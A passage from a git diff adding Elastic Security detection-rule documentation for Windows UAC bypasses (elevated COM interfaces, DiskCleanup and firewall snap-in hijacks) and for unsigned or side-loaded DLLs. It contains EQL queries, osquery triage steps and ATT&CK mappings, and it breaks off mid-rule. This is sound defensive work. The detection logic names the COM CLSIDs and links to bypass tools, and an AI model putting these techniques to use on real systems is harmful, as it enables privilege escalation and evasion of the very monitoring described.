masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Inspect the host for suspicious or abnormal behavior in the alert timeframe. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze any suspicious spawned processes using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.args : ("C:\\Windows \\system32\\*.exe", "C:\\Windows \\SysWOW64\\*.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface.asciidoc new file mode 100644 index 0000000000..a7ded8560c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface.asciidoc @@ -0,0 +1,106 @@ +[[prebuilt-rule-8-10-5-uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface]] +=== UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface + +Identifies attempts to bypass User Account Control (UAC) by abusing an elevated COM Interface to launch a rogue Windows ClipUp program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/hfiref0x/UACME + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and process.name : "Clipup.exe" and + not process.executable : "C:\\Windows\\System32\\ClipUp.exe" and process.parent.name : "dllhost.exe" and + /* CLSID of the Elevated COM Interface IEditionUpgradeManager */ + process.parent.args : "/Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Inter-Process Communication +** ID: T1559 +** Reference URL: https://attack.mitre.org/techniques/T1559/ +* Sub-technique: +** Name: Component Object Model +** ID: T1559.001 +** Reference URL: https://attack.mitre.org/techniques/T1559/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-diskcleanup-scheduled-task-hijack.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-diskcleanup-scheduled-task-hijack.asciidoc new file mode 100644 index 0000000000..0735dcc992 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-diskcleanup-scheduled-task-hijack.asciidoc @@ -0,0 +1,105 @@ +[[prebuilt-rule-8-10-5-uac-bypass-via-diskcleanup-scheduled-task-hijack]] +=== UAC Bypass via DiskCleanup Scheduled Task Hijack + +Identifies User Account Control (UAC) bypass via hijacking DiskCleanup Scheduled Task. Attackers bypass UAC to stealthily execute code with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.args : "/autoclean" and process.args : "/d" and + not process.executable : ("C:\\Windows\\System32\\cleanmgr.exe", + "C:\\Windows\\SysWOW64\\cleanmgr.exe", + "C:\\Windows\\System32\\taskhostw.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-icmluautil-elevated-com-interface.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-icmluautil-elevated-com-interface.asciidoc new file mode 100644 index 0000000000..a39edd726b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-icmluautil-elevated-com-interface.asciidoc @@ -0,0 +1,104 @@ +[[prebuilt-rule-8-10-5-uac-bypass-via-icmluautil-elevated-com-interface]] +=== UAC Bypass via ICMLuaUtil Elevated COM Interface + +Identifies User Account Control (UAC) bypass attempts via the ICMLuaUtil Elevated COM interface. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name == "dllhost.exe" and + process.parent.args in ("/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}", "/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}") and + process.pe.original_file_name != "WerFault.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Inter-Process Communication +** ID: T1559 +** Reference URL: https://attack.mitre.org/techniques/T1559/ +* Sub-technique: +** Name: Component Object Model +** ID: T1559.001 +** Reference URL: https://attack.mitre.org/techniques/T1559/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc new file mode 100644 index 0000000000..48be2db6ce --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc @@ -0,0 +1,154 @@ +[[prebuilt-rule-8-10-5-uac-bypass-via-windows-firewall-snap-in-hijack]] +=== UAC Bypass via Windows Firewall Snap-In Hijack + +Identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/AzAgarampur/byeintegrity-uac + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating UAC Bypass via Windows Firewall Snap-In Hijack + +Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted. + +For more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works). + +This rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Inspect the host for suspicious or abnormal behavior in the alert timeframe. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze any suspicious spawned processes using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name == "mmc.exe" and + /* process.Ext.token.integrity_level_name == "high" can be added in future for tuning */ + /* args of the Windows Firewall SnapIn */ + process.parent.args == "WF.msc" and process.name != "WerFault.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: MMC +** ID: T1218.014 +** Reference URL: https://attack.mitre.org/techniques/T1218/014/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unsigned-dll-loaded-by-svchost.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unsigned-dll-loaded-by-svchost.asciidoc new file mode 100644 index 0000000000..adf701a2cf --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unsigned-dll-loaded-by-svchost.asciidoc @@ -0,0 +1,179 @@ +[[prebuilt-rule-8-10-5-unsigned-dll-loaded-by-svchost]] +=== Unsigned DLL Loaded by Svchost + +Identifies an unsigned library created in the last 5 minutes and subsequently loaded by a shared windows service (svchost). Adversaries may use this technique to maintain persistence or run with System privileges. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +library where host.os.type == "windows" and + + process.executable : + ("?:\\Windows\\System32\\svchost.exe", "?:\\Windows\\Syswow64\\svchost.exe") and + + dll.code_signature.trusted != true and + + not dll.code_signature.status : ("trusted", "errorExpired", "errorCode_endpoint*") and + + dll.hash.sha256 != null and + + ( + /* DLL created within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */ + dll.Ext.relative_file_creation_time <= 300 or + + /* unusual paths */ + dll.path :("?:\\ProgramData\\*", + "?:\\Users\\*", + "?:\\PerfLogs\\*", + "?:\\Windows\\Tasks\\*", + "?:\\Intel\\*", + "?:\\AMD\\Temp\\*", + "?:\\Windows\\AppReadiness\\*", + "?:\\Windows\\ServiceState\\*", + "?:\\Windows\\security\\*", + "?:\\Windows\\IdentityCRL\\*", + "?:\\Windows\\Branding\\*", + "?:\\Windows\\csc\\*", + "?:\\Windows\\DigitalLocker\\*", + "?:\\Windows\\en-US\\*", + "?:\\Windows\\wlansvc\\*", + "?:\\Windows\\Prefetch\\*", + "?:\\Windows\\Fonts\\*", + "?:\\Windows\\diagnostics\\*", + "?:\\Windows\\TAPI\\*", + "?:\\Windows\\INF\\*", + "?:\\Windows\\System32\\Speech\\*", + "?:\\windows\\tracing\\*", + "?:\\windows\\IME\\*", + "?:\\Windows\\Performance\\*", + "?:\\windows\\intel\\*", + "?:\\windows\\ms\\*", + "?:\\Windows\\dot3svc\\*", + "?:\\Windows\\panther\\*", + "?:\\Windows\\RemotePackages\\*", + "?:\\Windows\\OCR\\*", + "?:\\Windows\\appcompat\\*", + "?:\\Windows\\apppatch\\*", + "?:\\Windows\\addins\\*", + "?:\\Windows\\Setup\\*", + "?:\\Windows\\Help\\*", + "?:\\Windows\\SKB\\*", + "?:\\Windows\\Vss\\*", + "?:\\Windows\\servicing\\*", + "?:\\Windows\\CbsTemp\\*", + "?:\\Windows\\Logs\\*", + "?:\\Windows\\WaaS\\*", + "?:\\Windows\\twain_32\\*", + "?:\\Windows\\ShellExperiences\\*", + "?:\\Windows\\ShellComponents\\*", + "?:\\Windows\\PLA\\*", + "?:\\Windows\\Migration\\*", + "?:\\Windows\\debug\\*", + "?:\\Windows\\Cursors\\*", + "?:\\Windows\\Containers\\*", + "?:\\Windows\\Boot\\*", + "?:\\Windows\\bcastdvr\\*", + "?:\\Windows\\TextInput\\*", + "?:\\Windows\\security\\*", + "?:\\Windows\\schemas\\*", + "?:\\Windows\\SchCache\\*", + "?:\\Windows\\Resources\\*", + "?:\\Windows\\rescache\\*", + "?:\\Windows\\Provisioning\\*", + "?:\\Windows\\PrintDialog\\*", + "?:\\Windows\\PolicyDefinitions\\*", + "?:\\Windows\\media\\*", + "?:\\Windows\\Globalization\\*", + "?:\\Windows\\L2Schemas\\*", + "?:\\Windows\\LiveKernelReports\\*", + "?:\\Windows\\ModemLogs\\*", + "?:\\Windows\\ImmersiveControlPanel\\*", + "?:\\$Recycle.Bin\\*") + ) and + + not dll.hash.sha256 : + ("3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6", + "b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4", + "214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba", + "23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244", + "5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Windows Service +** ID: T1543.003 +** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: System Services +** ID: T1569 +** Reference URL: https://attack.mitre.org/techniques/T1569/ +* Sub-technique: +** Name: Service Execution +** ID: T1569.002 +** Reference URL: https://attack.mitre.org/techniques/T1569/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc new file mode 100644 index 0000000000..0dde7bd432 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc @@ -0,0 +1,161 @@ +[[prebuilt-rule-8-10-5-unsigned-dll-side-loading-from-a-suspicious-folder]] +=== Unsigned DLL Side-Loading from a Suspicious Folder + +Identifies a Windows trusted program running from locations often abused by adversaries to masquerade as a trusted program and loading a recently dropped DLL. This behavior may indicate an attempt to evade defenses via side-loading a malicious DLL within the memory space of a signed processes. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +library where host.os.type == "windows" and + + process.code_signature.trusted == true and + + (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and + + not dll.code_signature.status : ("trusted", "errorExpired", "errorCode_endpoint*", "errorChaining") and + + /* Suspicious Paths */ + dll.path : ("?:\\PerfLogs\\*.dll", + "?:\\Users\\*\\Pictures\\*.dll", + "?:\\Users\\*\\Music\\*.dll", + "?:\\Users\\Public\\*.dll", + "?:\\Users\\*\\Documents\\*.dll", + "?:\\Windows\\Tasks\\*.dll", + "?:\\Windows\\System32\\Tasks\\*.dll", + "?:\\Intel\\*.dll", + "?:\\AMD\\Temp\\*.dll", + "?:\\Windows\\AppReadiness\\*.dll", + "?:\\Windows\\ServiceState\\*.dll", + "?:\\Windows\\security\\*.dll", + "?:\\Windows\\System\\*.dll", + "?:\\Windows\\IdentityCRL\\*.dll", + "?:\\Windows\\Branding\\*.dll", + "?:\\Windows\\csc\\*.dll", + "?:\\Windows\\DigitalLocker\\*.dll", + "?:\\Windows\\en-US\\*.dll", + "?:\\Windows\\wlansvc\\*.dll", + "?:\\Windows\\Prefetch\\*.dll", + "?:\\Windows\\Fonts\\*.dll", + "?:\\Windows\\diagnostics\\*.dll", + "?:\\Windows\\TAPI\\*.dll", + "?:\\Windows\\INF\\*.dll", + "?:\\windows\\tracing\\*.dll", + "?:\\windows\\IME\\*.dll", + "?:\\Windows\\Performance\\*.dll", + "?:\\windows\\intel\\*.dll", + "?:\\windows\\ms\\*.dll", + "?:\\Windows\\dot3svc\\*.dll", + "?:\\Windows\\ServiceProfiles\\*.dll", + "?:\\Windows\\panther\\*.dll", + "?:\\Windows\\RemotePackages\\*.dll", + "?:\\Windows\\OCR\\*.dll", + "?:\\Windows\\appcompat\\*.dll", + "?:\\Windows\\apppatch\\*.dll", + "?:\\Windows\\addins\\*.dll", + "?:\\Windows\\Setup\\*.dll", + "?:\\Windows\\Help\\*.dll", 